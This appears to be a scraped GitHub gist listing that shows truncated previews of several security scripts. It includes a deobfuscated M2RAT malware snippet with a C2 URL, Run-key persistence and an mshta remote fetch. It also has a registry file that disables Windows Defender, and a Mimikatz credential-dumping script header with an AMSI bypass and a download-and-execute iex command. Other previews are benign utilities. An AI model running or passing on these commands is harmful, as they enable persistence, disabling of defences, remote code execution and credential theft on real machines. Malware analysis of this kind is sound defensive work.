This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Deobfuscated M2RAT | |
# Refer: https://asec.ahnlab.com/en/56857/ | |
Start-Sleep -Seconds 68; | |
$buffer = 1024 * 1024; | |
$hostid = $env:COMPUTERNAME + '-' + $env:USERNAME; | |
$C2_URL = 'http://navercorp.ru/dashboard/image/202302/com.php' + '?U=' + $hostid; | |
$TEMPORARY_FILE = $env:TEMP + '\jXShAegMEWMw'; | |
if (!(Test-Path$TEMPORARY_FILE)) { | |
New-ItemProperty -Path HKCU:\Software\ Microsoft\Windows\CurrentVersion\Run -Name fGZtM -Value 'c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta http://navercorp.ru/dashboard/image/202302/4.html' -PropertyType String -Force; | |
} |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows Registry Editor Version 5.00 | |
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender] | |
"DisableAntiSpyware"=dword:00000001 | |
"DisableRealtimeMonitoring"=dword:00000001 | |
"DisableAntiVirus"=dword:00000001 | |
"DisableSpecialRunningModes"=dword:00000001 | |
"DisableRoutinelyTakingAction"=dword:00000001 | |
"ServiceKeepAlive"=dword:00000000 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Confirm it works in Windows 10 2022 | |
# Dont download this but execute the next line in command prompt(cmd.exe) | |
# powershell iex (wget https://gist.githubusercontent.com/Sh1n0g1/b93b48a54276145bd117403a38fd9816/raw/637d7447dc7a99e21cfeec18bec950abbc1bd642/Invoke-OneShot-Mimikatz.ps1).Content | |
# You will get creds | |
# | |
# AMSI Bypass is copied from payatu's AMSI-Bypass (23-August-2021) | |
# https://payatu.com/blog/arun.nair/amsi-bypass | |
$code = @" | |
using System; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Reflection.Assembly]::LoadWithPartialName("System.Drawing") | |
function screenshot([Drawing.Rectangle]$bounds, $path) { | |
$bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height | |
$graphics = [Drawing.Graphics]::FromImage($bmp) | |
$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) | |
$bmp.Save($path) | |
$graphics.Dispose() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Initialize | |
$Weekday=@("Monday","Tuesday","Wednesday","Thursday","Friday","Saturday","Sunday") | |
$LoginData=@{} | |
ForEach($w in $Weekday){ | |
$LoginData[$w]=@{} | |
0..23 | % {$LoginData[$w][$_]=0} | |
} | |
#Get the data from Eventlog | |
$i=0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Bulk IP Address 2 Geolocation Using freegeoip.net | |
#Input: IP Address List | |
#Output: IP, Latitude, Longitude (CSV Format) | |
import urllib, json | |
#Paste your ipaddress list | |
ips=""" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import peutils | |
import pefile | |
try: | |
pe = pefile.PE(sys.argv[1]) | |
signatures = peutils.SignatureDatabase('./sig/userdb.txt') | |
matches = signatures.match_all(pe, ep_only = True) | |
if type(matches) is list: | |
for m in matches: |
NewerOlder